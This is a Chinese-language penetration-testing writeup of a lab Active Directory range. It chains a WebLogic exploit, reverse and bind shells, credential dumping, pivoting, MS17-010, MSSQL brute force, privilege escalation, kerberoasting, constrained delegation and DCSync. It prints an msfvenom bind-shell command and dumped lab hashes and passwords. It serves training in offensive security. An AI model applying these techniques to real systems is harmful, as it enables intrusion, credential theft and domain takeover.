​某内网域渗透靶场的writeup

最新推荐文章于 2024-06-13 21:44:39 发布
最新推荐文章于 2024-06-13 21:44:39 发布
阅读量2.5k 收藏 1
点赞数
文章标签: 网络
原文链接:https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247504846&idx=2&sn=035cfda685c168229b2cc0fc0b779202&chksm=fc3c6acfcb4be3d94843df9e65a8567932c2f958aa796a1eb3cbcd8f62c42f5d973975908a45&scene=126&sessionid=0
版权

前言:

本靶场是由"渗透攻击红队"所制作的一个靶场,看了看感觉效果十分不错,比较综合且有一定的思路扩展性.这里我们将会从别的一些角度来玩玩这个靶场,具体往下看。

源作者的wp:https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ

Keep moving

1.本文采用 HTB/OSCP 的 Offensive style, 脱离CS, msf (msfvenom 不算)2.优先不走 EXP 路线3.靶场环境不能与实战相提并论4.且同时这是详细地记录了全过程针对于该靶场进行攻击.所以会有一些尝试与转换思路的部分.5.不喜勿喷

0x01 Enumeration

获取Target ip
b9e86b925e42f73cd9eb4ced8a1978ae.png
pic1-获取Target ip
nmap

8e2b3ebccc7f939f2593d54b215f45b2.png

pic2-nmap1

77b86dcd15d31c378355103eae1c1e06.png

pic3-nmap2
尝试RPC匿名登录
3d8b14ec5a865f4cbb33863b616395ba.png
pic4-尝试RPC匿名登录
smb 匿名共享
347c1eb4dfdc1dd9e9ea3b096ed6013e.png
pic5-smb 匿名共享
获取目标有没有IPv6
59efb2cec730790b669ad91a42a9db22.png
pic6-获取目标有没有IPv6
RPC获取内网ip (rpcmap ncacn_ip)
890da212dcf006c39fe66060955dcdb0.png
pic7-rpcmap ncacn_ip 
192.168.10.228
10.10.20.12
获取weblogic 版本
badd28a2cfd63e335c909de466d1c252.png
pic8-获取weblogic 版本
weblogic scan

888384d571c948e6043f74fe4d63edaf.png

pic9-weblogic scan

0x02 Foothold

CVE-2019-2725 to get command execution
53b60ab9249b7eadf334eee47c0c46b3.png
pic10-CVE-2019-2725
whoami
7a49b3761f877c900e9a21fd13a53c71.png
pic11-whoami
tasklist /svc resiult show me in wired way

6120a74b2669fe3ead4e9d876bc9c4e1.png

pic12-tasklist /svc
探测出不出网

61e85e846f5e812a60a73d815668b221.png

pic13-探测出不出网1
641e73ee5ce53678503a225780091128.png
pic14-探测出不出网2
Nishang
1533d1db6a8fcfeafcfc60fd79651ccc.png
pic15-Nishang1
fb187249d73d9757bf1b70264e488a25.png
pic16-Nishang2
Got reverse shell
c50533d59d3626ad6c892bad19eaeab4.png
pic17-Got reverse shell1
c004ba01dd8b3767836035ae0a2da03d.png
pic18-Got reverse shell2
whoami
6ee05a2e061fc32a2fe6192ee317e40f.png
pic19-whoami
IP configuration

发现有另外一个网段

321cb1a0850f560ac6c01940b71e58ee.png
pic20-发现有另外一个网段
Enable winrm to get a better shell
f704c845b32c30585a8a54dcfb9c8ab9.png
pic21-winrm to get shell
Use reg save to dump hashes
8aa1232cf28921afbdcacf8f865b5221.png
pic22-dumphash
Kali box pop up a smb server
78edbd714131b380bc276cdcfcc84048.png
pic23-smb server
Mount kali box share path
94cea8e8f94d50ed183f3440b3b20a83.png
pic24-share path
Send it to me
791fa8d1cdaa399fdcb16d122f9d4663.png
pic25-send1

324393c43384677b88b06c6faf799238.png

pic26-send2
Hash dump
11ec82e539e83b01f277cd03dc0aeaea.png
pic27-Hash dump 
ccef208c6485269c20db2cad21734fe7
Login into winrm as Administrator
5c1ae8045df6aa4c1c71a52145e2d6b7.png
pic28-winrm to Administrator
flag
7c27a6d3cc2cffa6640b58f53d5290cc.png
pic29-flag
Dump lsass
9cb815545d7f6f5e07b4050457b68192.png
pic30-dump lsass1
cf600ea4a6e02342dd4fcfc6d27381bc.png
pic31-dump lsass2
3bb52a3c6cc10816b986e68e797981e4.png
pic32-dump lsass3
pypykatz
e7583616fabdc4e20a244b40e08cb4eb.png
pic33-pypykatz
But, I don't see any other credentials in dump file
03fef428d6a10a66a22b3fa644d47b0a.png
pic34-weblogic credentials dump file
Weblogic password decryption: find out AES key

7a380e25d466172a6efa110a9decba4b.png

pic35-weblogic AES key_1

c395a0a98db6d013285b3b39cb6b8c0f.png

pic36-weblogic AES key_2
a7ef89b562cf26ded6083f889e12fd28.png
pic37-weblogic AES key_3 
{AES}1zzY2R1UMGFWfd1rAA92N2QljODSa8S16dJIsZZi/do=
Weblogic password decryption: decrypt with dat file
429a6a0cd32d2647c6f3c9f0dd1ee6ce.png
pic38-decrypt weblogic dat file_1
9f54291560e57b1a0dde197bd3a939f6.png
pic39-decrypt weblogic dat file_2
41316334d10f2b0594e8f7f367189d0b.png
pic40-decrypt weblogic dat file_3
Cleartext
weblogic123
Current credentials
administrator:ccef208c6485269c20db2cad21734fe7
weblogic:weblogic123

0x03 Lateral Movement

Find another machines
060eb53c969565be59ba4ec50e09d2fb.png
pic41-find another machines 
10.10.20.7
Upload portscan.ps1

(当然这里你也可以选择挂代理)

a32e5bf3e9804f4e1e031dedd5268af4.png
pic42-Upload portscan.ps1
scan 10.10.20.7
2e14bf5ae871524a79c87729e5fb40ba.png
pic43-scan 10.10.20.7 
135,139,445,49152,49153,49154,49155,49156
pivot
356a10ea29d9c0d8794092142e5470eb.png
pic44-pivot
upload chisel
c80e1ab09a6f2034f2c83ce69e852408.png
pic45-upload chisel
Handled a proxy on port 8100
45d4bc50fe15b6abeefbc8f678026f7d.png
pic46-proxy on port 8100
proxychain
171e401aef9e7bd80bf0ef19f8dc7b09.png
pic47-proxychain
nmap scan target over socks5
9f3f2c1a10c57904526e751a09f4fef3.png
pic48-nmap scan over socks5
10.10.20.7 report

16e8347c20142e0ee366c8862afa09de.png

pic49-10.10.20.7 report
Next Target
work-7.redteam.red

0x04 Work-7 takeover

Try to login rpc with anonymous user
2a0b79efd539ca1b2adc731510273502.png
pic50-login rpc with anonymous user
Login smb shares with anonymous user
7b4be063598352e14095d3416c2ffe4d.png
pic51-login smb shares with anonymous user
start to scan vulnerability of port 445
09d50c79c4b375df8a631523d4885417.png
pic52-scan vulnerability of port 445
Got ms17-010 vulnerable alert
4b1f606c9451b7ceaf32bad8a13a874c.png
pic53-Got ms17-010 vulnerable
Something funny

用之前的密码直接shell了(但是这是作弊,不可取) 后面查看了一下,密码这块设计得不太合理

9ed5e4211391eefbcaa6fe817ac47981.png

pic54-密码设计存在非预期缺陷1
c28ef797f51219327dca8d96c04c2e17.png
pic55-密码设计存在非预期缺陷2

直接横向了

4392bb2f88071203a04ab3eb1e2d59aa.png

pic56-横向移动1

67581912f5c6317a1f0390ef14359ab4.png

pic57-横向移动2

get system

1131da145ed40afc6e753d0b3cc92418.png

pic58-get system
回到刚刚,我们不选择作弊,查阅nmap结果,我们看到有ms17010
a474908960e439d6f7a3e2f7dd5f1eef.png
pic59-ms17010
MS17010 without metasploit

原先想用window/exec,每次攻击完都会炸,我这边测得不行... msfvenom bind shell

msfvenom -p windows/x64/shell_bind_tcp LPORT=9001 -f raw -o test.bin && cat sc_x64_kernel.b
in test.bin > sc_x64.bin

生成shellcode,并且merge with kernel header,然后send exploit,最后挂代理正向NC

dada94ca2f608c7b9416aae14f4a0491.png

pic60-生成shellcode 代理正向NC
Shell came back: 康康有没有域
e49ebf6661f6f1f06929cab602b775b5.png
pic61-wmic查看域
本地先加hosts
2508832a20b047553b006a2b5bddfc5f.png
pic62-本地加hosts
看域控
f460fb0195f7a0c9d22c014a65f89f95.png
pic63-查看域控
获取域控ip
63caefdc1cb5efb19657a5c0dcac34ed.png
pic64-获取域控ip
查看本机ip,有另外一层网络: 10.10.10.0/24
14c287bb623888f79173db4c41a4290c.png
pic65-查看本机ip
File Transfer in work-7

因为有一层代理的原因,所以下载win7的东西比较麻烦,win7从我这拿东西也麻烦 回到入口机器,添加一个xiaoli,并且加入管理员组(你可以转B64传上去,也可以开匿名共享,随你喜欢)

dc8df478d2f97406d5164c9d54b438e4.png
pic66-创建一个用户并且加入管理员组

wrok-7这边直接挂载入口机器的C盘

fedc5039ee686f6c0204b150f235ac2b.png
pic67-work-7挂载入口机器的c盘
Hash dump

当前work-7机器的system有点智障,虽然有个seimpersonateprivilege,但是我也能加用户(如果你知道当前system的权限发生了什么,麻烦私聊告诉我一下)

506c099afd5e0f06cdc1b377b403c2f5.png
pic68-reg save失败

添加 xiaoli 用户,并且加入管理员组

9df12be61962f1157dc3a1b8772f1061.png
pic69-添加账户加入管理员组

添加上的用户没有显示pwned,非常奇怪,那也无妨,只是没有更好的 shell 而已

edb763c696a8536c4c4e12f4de2e495d.png
pic70-新添加的用户

runas 登录上创建的xiaoli用户,执行命令并且写到C:\nani.txt

bbd8e503b949fbd3c7b8dd6a5852e261.png
pic71-runas登录创建的账户

查看C:\nani.txt,发现创建的用户privilege比现在多(对比分明)

41a89764d50c93f452b772cd650d20f6.png
pic72-查看nani.txt

Hash dump with runas

de6dd36f4dad50851d7d2bde60e1c017.png
pic73-通过runas dumphash1
8cb98ade08591351bf6e838d9b7b5380.png
pic74-通过runas dumphash1

放回挂载的共享磁盘

7d0c3badcaf292baaf5a47f3d578280f.png
pic75-放回挂载的共享磁盘

接着再取回到kali本地

e7c778537147de067f73c02c02e3653a.png
pic76-接着再取回到kali本地

Got hashes (图中框错地方了)

744342a410355f636b293d02230a158d.png
pic77-Got hashes_1

71975682422755997d21d55720502117.png

pic78-Got hashes_2 
[*] Target system bootKey: 0x6f92d265d06097e1615a7c355022bc9f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:e91d2eafde47de62c6c49a012b3a6af1:::
john:1000:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::
xiaoli:1036:aad3b435b51404eeaad3b435b51404ee:e91d2eafde47de62c6c49a012b3a6af1:::
[*] Dumping cached domain logon information (domain/username:hash)
REDTEAM.RED/saul:$DCC2$10240#saul#38df64c20e0fdadc85a421815ed5b011
REDTEAM.RED/Administrator:$DCC2$10240#Administrator#1ca30d7ae7506e6ca094794f8167f1e4
[*] Dumping LSA Secrets

其实可以使用进程注入,注入到有域凭据用户的进程,然而并没有

149f971fdc45d19cbfa0a1af7a0bd163.png

pic79-尝试进程注入窃取凭证,但是失败了
Dump lsass

不太死心,dump lsass康康

2c8bffc72bf6a68108df07d2b2c3611a.png
pic80-dump lsass

取回本地,minidump方式解开

f1d8ccea1d0b84d877c0a84cc35c7663.png
pic81-minidump方式解开

无其他用户了,顺便机器账户顺走

266c564dd23fe1a13fc7516c7446e755.png
pic82-域内用户1
d553af35cc00b93292a10886e290e4fc.png
pic83-域内用户2 
redteam.red\work-7$:f085f13639b3de3c78de926c0719d36d
Something makes me confused

这个应该算work-7的flag了,来saul用户桌面

7ac7c2f5bf03d6ff653dca2946d24982.png
pic84-work-7的flag_1
e43615e672d06adb8951a867d90dc35f.png
pic85-work-7的flag_2

txt里面说john是本地管理员,但是算了(可能是靶场环境问题吧....)

764d8690508ec38a90ab9dac784d8d0e.png
pic86-可能是靶场的环境问题

0x05 AD enumeration

AD informaton gathering

system 请求网络资源用的是机器账户,直接康康域内基本信息

510998d7037f5a24ba25a957ef150b18.png
pic87-域内基本信息1
795be194c379ae4bc20a6ee32bb49d0c.png
pic88-域内基本信息2

域控

c46f3eef9da9b785048951c49e58c83b.png
pic89-域控 
OWA.redteam.red 10.10.10.8

域内两台机器,一台域控,算上自己,分别看IP

5094f7b07eadbe1f62fc317ae76f3e65.png
pic90-域内的两台机器-1
dd536819313dfaf7bb8a1ead998b079f.png
pic91-域内的两台机器-2 
work-7.redteam.red 10.10.10.7
SQLSERVER-2008.redteam.red 10.10.10.18
OWA.redteam.red 10.10.10.8

基本操作

2c54f34fb2f1c3145e37a0c9bff8e937.png
pic92-收集域内用户名 
net group "domain users" /domain
The request will be processed at a domain controller for domain redteam.red.
 
Group name     Domain Users
Comment        
 
Members
 
-------------------------------------------------------------------------------
adduser                  Administrator            apt404                   
gu                       krbtgt                   mail                     
saul                     saulgoodman              SM_4c09f7e38ef84c22b     
SM_645db7f160894c7fb     SM_958e768f5a2e4c9fb     SM_dfb6b69905864ca19     
sqlserver                
The command completed successfully.

看域信任,无子域

2ea91901f48c67b0bc0417460581b8e0.png
pic93-看域信任

1 当然你也可以用powerview做信息收集,这边就不用了 2 实战的话,sharphound一般被杀得很严重,你可以远程执行bloodhound (ldapsearch with convertor),但是这边原先想直接上sharphound

看上去只有DotNET 3.5,目前只有sharphound2支持,sharphound2得弄一堆环境,懒了,看来只能远程bloodhound了

588f96c3afd23329064a4dc0883321fd.png
pic94-Net环境
Multi-level pivoting (No Frp)

回到入口机器,把原来的chisel client关了,重新开一个带端口转发的(此时work-7会断开,小问题,重新打回去)

172e9d7432e86fd4ef6b5f914b692bfe.png
pic95-重新开端口转发

work-7 开多一个shell,上面port 9002,下面port 9001,并且上传 chisel 到 work-7

0a2a31eeef098e43cc4c6732a8e3a6a5.png
pic96-开新shell

接着,入口机器再开一个server(reverse proxy)

84932acaab99554bea11b3fc1f79f0a6.png
pic97-reverse proxy

回到work-7那台机器,回连到入口机器

860feca1ea013688c8b2a98229f51037.png
pic98-回连入口机器

此时,本地访问8001就直接访问第二层了

69bc6194bed920e4534094c46d9ee28e.png
pic99-本地访问8001

修改proxy配置

ec1ff978b80f5058ffcef14e1092ad3a.png
pic100-修改proxy配置

CME用机器账户登录一下域控的 LDAP 服务 ,已经到达了

f3d0348189937735bbca3706ba7f298a.png
pic101-机器账户登录一下域控的 LDAP 服务

本地加hosts

0f444ec3f3c054298ff2ffbdcceca10d.png
pic102-本地加hosts
Bloodhound result analysis

Run bloodhound remotely

8599b8c52db1e69c29c5441be392e3e1.png
pic102-bloodhound

Import results

0f90045ebde043b35f71f52576650140.png
pic103-Import results

Shortest path to domain admins

63101a70f13432a71b71ba85c8d1b1db.png
pic104-Shortest path to domain admins

最短路径到Sqlserver用户

4222599fb222c23c6fb9e96b2f03ebad.png
pic105-最短路径到Sqlserver用户

SPN Accounts

6560a25e9f9fcae2bb70c1ab9ded5e96.png
pic106-SPN Accounts

获取 AS-REP Roastable users,并没有

9b094688c7ed126ed544f5be2a38a099.png
pic107-获取 AS-REP Roastable users_1
9a137ba0547459abf4e22f305b902826.png
pic108-获取 AS-REP Roastable users_2

kerberoasting attack

6b5ef5f49f8932f538611530fa3406ca.png

pic109-kerberoasting attack 
$krb5tgs$23$*sqlserver$REDTEAM.RED$redteam.red/sqlserver*$859542523a2e592829568bcf4b22adc7$bd544d4ce42f5c024184b2d61c42c8b0131edf5e161f36faf6cf5c9fea367c77907faca606bcb2d7ed5af99afeefef0fe1a6212639874834f1ea9226bd7c092a608b60f19b9442f64291c6c0bc8fa49ec4078ff597fdd69d5699ca1e9412cdd436c27977088ad8fb4863c8aabe4ccc080bebe8167d7907b7829f95aefdadb1a39e7ba276ecda0910bc363e3a45da7cbdec015487a9fff6dc57388855b71fb50536192cf22ecb341a1f9ae556b2a4fd52f52fd83cb9df27eefd0d54c22594bd41425fc30265789e26790e36066a67cfcf06343c43042940b97f5d659ef3fdbd13dd4db2199749190e1f9fb68c10116eb9889d54c1fc32c26d4f8e3e8b4075be4d09c30951550a611bbda43511c2d354e88c1eab79328fc4a79edd7b0adbaeeab175ce35c664935a58b25a2cb35c4a86c4f801678dbe9ae4b4c73af61998b063f1305a012164b5cbf556015b4d496dcf9d986e8c7d2ac70ade3a5103da73431e60b2b61f7821ead30734b6775c49ca895742f351bcfecad248e67ec3693466eccd30f4765ed083af1ecfec2d87e2859e85f84e3e941d821dfb7e5521aee38d709bcd541c6a1772a4c79e6fb5a55afcaedff6668a5667729473c801087725f30de6e2998f960d933e088febf7090f2fea71cf15d93850147d1d2e03db8d455ddba5af732128a7f852e52dc18bc9a70b9e9d9abb8e614206e2c3e728c20340cc0832f8297b0e8d72693cbcac8355da06c437dee968adea17338e4b934df96ff98b459cb78cd960015ef5295b62817ffe7a13121b674a3fb97dbbbcc1007397862dbd72a8c1047a9da618d3b96e444b0ce1868466ab91ffaadb2b7e3a81f35b343afa3396272dbaa8c8305414872ba668a206b326ce55213c5c50c551cd816ad6eed9739a009d088bb872e3853fffa7e3eaa982139587fa32bd06ef8b737d29cdc082a9a173989c8617917b3facb1e36cedd8774aa0c1756e76351162a6e3bfe4f2fa6bb9e88ae2c86fccfbc90050d867725b4f266048f7e6e9d1c296504c661883fac459f4e91e08dfc0bfd0c211541c16cb5e9ec30dffe99e326e7b3f8459d35b03a30847bd11a46e7ad77e096cce2a5a3cda1103615e307cfcaeffbb3febf795db58c16ecdfeeaa6fc003f308021594965f148f1163c739ad942050778cbe6e478114479c0cf69495c0f4831dea117ea9b90956c13a07edfcdf4c25d05087059106c11c195bc0412ad5dc8bc6b7159140c675f3e
 
$krb5tgs$23$*saulgoodman$REDTEAM.RED$redteam.red/saulgoodman*$7d30d61df9b0fd9ca713c72ef6588b24$6dde0c314f9935c81d5a448d041ecdb45d5b8eebe88c480c7862a2932da02c655857f3b6122dfce0ea886b7835c6d8adde421eb3e5a960a10f01fa4789ba45e585975b54b7f2407bc61f839f8e6c0273cb58973da3d0dce43ea3a875e7fd6fa054016eb816fdf257f6e94535943a0d7cb13c4932ec3f661daef56d61beb0340a21582c578e4ce6c1839b493444e03f11ea79d7db8d4b74b7750cf9cc8881f0825a04959083ed72d9b17c0dc00ae28b04f930a66c995bff65e8cfe8e5eb1863a7d5a1536888df99a55febb1dc0cc80a099304feb6b252d8a7bafdf23a139abe7c03daeed388de81aaa7d9456adb355827420b9996d2e2e8d3e7180788def64c76aa15a319f486d94154cdc1ee888b67fd5058177fe123d48e67489e48ba860d5e79152082537213ccbfa90372f20a66834f9c2d6ef786a63943d00c7eb5665e257c5e06e84979a5f9a9c532e2a8912e44f1e226b68db269d367456b13b35cbe1caceb76dc9b19ff5e805260df270993cd8dd84d17574f6d20075c3ceedd070e57311d7b2e10ec4d0c1e700da04c43c4761e37af15a2c2145f42ccec3d66c992f153928c6d906d3fcec038e4d81211bccac30ed729a31c02d009c055de21d528e491aa805cd2f487eaefad4aeecc8b9db72902ef092dd8de0a3f42b8098aa0de970dce4b682d0f54c7edeb492af23d3062d614da5cf7ef875dd09000d14a3fcecbee4197902bfae6cecd94820d3b2217d443795489581d100171bfb5b95948eb836b76097cc9b60b6adb97647e465c0e6bb571af2fe332e92cfb35b56a4d281adf831dc13c1c5886f245085372d463a15dae82a2748717783d4c3e9d163c022ede2862a4b306603e77b4245aa5b7fd5ce3e70c20e466828a4b4583701b41f917e287c1cdb9f72d1c14918861b7d3c1610e2fbd5c7169e764e5311e1083f47b82b37cfba3bdc94fee39ef5d65649871287b6e08f8c03942ae01e727e793bf70d793761c78732d80c00c22365642258630cb237dd348b7ea2ab408420583f5786f179967b47aab39cf497159ec80f06226b74b2d150a85d956ab3db79a605c59c03a5b97c8772f584b15a94af23d9ba9d9cd6cbc78a56af19ae22a8c2dda248d4a53b9dc48a7d040172c73bb3f887c6f188dc83d18a6925d019946d8675efbd848132ee35ad0616177fde20738d7e9765ff21cd2a4f092b07acbbcf91b9eed8d5fb12a9a4da07c5546c3dab03424888ec9a42616d0

不幸的是,我没有爆出来

aa5087aa0c088ae7de2ad44fced8d14f.png
pic110-很不幸没有成功

当然如果你的字典有的话,那你可以直接跳到约束委派了

316470d099d9bef824f73cadb7def471.png
pic111-无字典悲

换个思路

0x06 sqlserver-2008 takeover

前面提到域内还有另外一台机器,Nmap 扫描 sqlserver-2008
11a73341eec68584403e570e5cc6f9cb.png
pic112-Nmap 扫描 sqlserver-2008
sqlserver-2008报告
# Nmap 7.92 scan initiated Thu Nov 11 13:16:29 2021 as: nmap -sC -sV -sT -Pn -oA sqlserver/nmap -vvv 10.10.10.18
Nmap scan report for sqlserver-2008 (10.10.10.18)
Host is up, received user-set (1.0s latency).
Scanned at 2021-11-11 13:16:29 HKT for 1132s
Not shown: 988 closed tcp ports (conn-refused)
PORT      STATE SERVICE      REASON  VERSION
80/tcp    open  http         syn-ack Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds
1433/tcp  open  ms-sql-s     syn-ack Microsoft SQL Server 2008 10.00.1600.00; RTM
|_ssl-date: 2021-11-11T05:36:06+00:00; +45s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-11-09T08:18:34
| Not valid after:  2051-11-09T08:18:34
| MD5:   8aaf 87ec b5a3 8e9f c52f 80c5 4445 8e06
| SHA-1: c677 90ba d6fe 6da6 29de dae6 0844 49ce 5c29 2f88
| -----BEGIN CERTIFICATE-----
| MIIB+zCCAWSgAwIBAgIQYGTu9bynvLtNoEYZlMAoWTANBgkqhkiG9w0BAQUFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjExMTA5MDgxODM0WhgPMjA1MTExMDkwODE4MzRaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAl9gm+X/dC/ip
| WnxqzLJQThFXQvm+aUyEoYuf3ZhNZh/ogz/QYXP7yMmOYbaSlScb/kaj2sloI1ik
| 3jJtVWvEpgV9bZQW5Eh2Hr/YKSTErpis+4+9N4afMopHQRRXdf+nnIQFXkE5wNXd
| 021lhqggGPRVBv8iNf/jH5xvtkqFyK8CAwEAATANBgkqhkiG9w0BAQUFAAOBgQA7
| R9VTz2kwKwohCVgU4/nYH8VcuQazt8qA5/agD0b3iDzr3bPszKUqG3wLZc+sq1h6
| OWE7oPCMyfb4zSWFGqw3nFQ7xOs24RHYFNO3LngrLkwrhJmLGwIPdt5ELOv1n74H
| Hr46INlupWAYN/Ph+9i7PvZ1beLMh8c0wTCOkjwwWQ==
|_-----END CERTIFICATE-----
| ms-sql-ntlm-info: 
|   Target_Name: REDTEAM
|   NetBIOS_Domain_Name: REDTEAM
|   NetBIOS_Computer_Name: SQLSERVER-2008
|   DNS_Domain_Name: redteam.red
|   DNS_Computer_Name: sqlserver-2008.redteam.red
|   DNS_Tree_Name: redteam.red
|_  Product_Version: 6.1.7601
2383/tcp  open  ms-olap4?    syn-ack
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack Microsoft Windows RPC
49156/tcp open  msrpc        syn-ack Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 2012; CPE: cpe:/o:microsoft:windows
 
Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 57750/tcp): CLEAN (Couldn't establish connection (Nsock connect failed immediately))
|   Check 2 (port 12518/tcp): CLEAN (Couldn't establish connection (Nsock connect failed immediately))
|   Check 3 (port 11000/udp): CLEAN (Timeout)
|   Check 4 (port 8803/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -1h35m17s, deviation: 3h34m40s, median: 43s
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: sqlserver-2008
|   NetBIOS computer name: SQLSERVER-2008\x00
|   Domain name: redteam.red
|   Forest name: redteam.red
|   FQDN: sqlserver-2008.redteam.red
|_  System time: 2021-11-11T13:35:52+08:00
| ms-sql-info: 
|   10.10.10.18:1433: 
|     Version: 
|       name: Microsoft SQL Server 2008 RTM
|       number: 10.00.1600.00
|       Product: Microsoft SQL Server 2008
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2021-11-11T05:36:00
|_  start_date: 2021-11-09T08:18:45
 
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 11 13:35:21 2021 -1 IP address (1 host up) scanned in 1132.14 seconds

既然出题人那么喜欢ms17010,那我也来脚本小子一下,可惜并没有

bfe8daa88f83bf1aca0ea5778004c643.png
pic113-尝试ms17010但是失败
Try to login SMB shares with anonymous user
34c7b4130d730d38e9b0bafbf5a4e5f1.png
pic114-login SMB shares with anonymous user
Try to login rpc with anonymous user
609ba619ef9496b7ef4483e79280f8cc.png
pic115-login rpc with anonymous user
康康有没有别的ip段,或者看看有没有 IPv6
252072398f56b27302adb9858cf76dc6.png
pic116-扩展一下别的段
Port 2383

SQL之类的服务,那么我们现在康康端口80和1433

9cf4fe1d2bc5e6c0d58e71a123a10c4f.png
pic117-port 2383
Port 80

web service directory brute force

6e0ded43892755b1e7c5c355123846af.png
pic118-web目录爆破
Port 1433

看上去是一个老版本的 SQL Server(没有找 EXP) 尝试mssql爆破,impacket 和 CME 报错了

c6dea4eabb6fac1b6dafa867c76ec0d7.png
pic119-尝试mssql爆破-1
535cf063e4662bbe57be3d30457360eb.png
pic120-尝试mssql爆破-2

但是失败了

自己写的 MSSQL 爆破工具(找大牛加的多线程) 使用常用 mssql 用户名和密码(From seclist)

5b8ac62333ba270120898459631d4949.png
pic121-生成常用的mssql的用户名和密码

爆破mssql,没有报错(展示)

433824c5464b9f62eeda26f09ee8a29d.png
pic122-爆破mssql

爆破成功

437e0bc5c2cd9e39037a81791a5ffa14.png
pic123-爆破成功
Try to get bind shell

登录,xp_cmdshell

8ffeb6aadf76788ba49db8fddc7d8de5.png
pic124-xp_cmdshell

Powershell Bind shell oneliner

2325a041eeb59ea7c18aa055aaed003f.png
pic125-Powershell Bind shell oneliner

尝试连接,可以

230f5959f2479945733d88e2d25857a7.png

pic126-连接成功
Privilege escalation
Current privileges
4272f4c0bc089bc08da77f72690e41e1.png
pic127-Current privileges
Download potato
a7297df6b6b14f5d0e57739ea147e9bd.png
pic128-Download potato
Upload it

(Sql server 连接脚本自带UPLOAD命令,原理:转b64 locally, 然后切割大小为1024kb,,再回到windows copy合成一份,接着再解密)

47b4a9ddaf8559cdf37ef93bce6167dd.png
pic129-upload potato

Try to do privilege escalation and we get system (default clsid)

c4f03f282758c94565cf554c75ed3dc3.png
pic130-privilege escalation

Get shell with system privilege

35253583c3c0bb69c948b46ef97e4f42.png
pic131-get system shell

flag

8042f5d4bcecf80355fbd6af9c92e8fa.png
pic132-get flag
Get credentials

查看当前进程,当前进程有sqlserver的存在

22e5b13b480e79f96d3914e459f50065.png
pic133-sqlserver进程

Upload procdump

7ebc02dee2dde2020512e397f9c40bc4.png
pic134-upload procdump

dump lsass & hash dump through reg save

c28736a5c38f0e7c704075bb612b55be.png
pic135-dump hash

开SMB匿名,www目录我放不了文件,不知道为什么,放了进去没读权限,用户下不了。(icacls也试了,不行) 这边就直接绕路,用三好学生的匿名共享脚本 (我自己创建了个本地管理员用户,但是SMB连不上,所以才用匿名共享)

2d2df6afa16aa05bf1ab9efb53b64a0a.png
pic136-smb匿名共享1
ae46402d21525596d236b556572d550c.png
pic137-smb匿名共享2

smb 下载文件

3efc7b65e636b635edc42f46f2b4bc9f.png
pic138-smb下载文件

下载完成后,关闭匿名共享

382640ad5ccb89fa348500fe7a1f05d1.png
pic139-关闭匿名共享

secretsdump 解开reg save的hashes

b6fe80b8e2933c23cb655d7c1ad1fafb.png
pic140-secretsdump解reg save的hash

解开lsass的dump文件,现在有sqlserver的凭据了

5f9f4a7e38a0b26cc52d0b6e2af640c2.png
pic141-获取sqlserver的凭据_1
b23bcd1de878581439ab6dbd449f9397.png
pic142-获取sqlserver的凭据_2 
sqlserver:6a59bf65a4957ac67e5fb4e1c221939c

Login ldap with user: sqlserver

e417d7293b9733c54b17d6e945a49175.png
pic143-Login ldap(sqlserver)

0x07 DC takeover

Attack path which I method

User: redteam.red/sqlserver is allow to delegate cifs service of OWA(DC controller)

fbace578ecaf4cfbd93c7768730caf85.png
pic144-sqlserver允许委派OWA的cifs服务
Constrained delegation Attack
1a40e2b657e479d24b2b76c038e35971.png
pic145-约束委派攻击
DCsync

c5e98c90f478209ac17742db2891dd04.png

pic146-DCsync 
redteam.red\Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::                                                                                            
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                                                
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a67f14d5cc4fa22618c8b609e832db6:::                                                                                                               
redteam.red\SM_4c09f7e38ef84c22b:1120:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                    
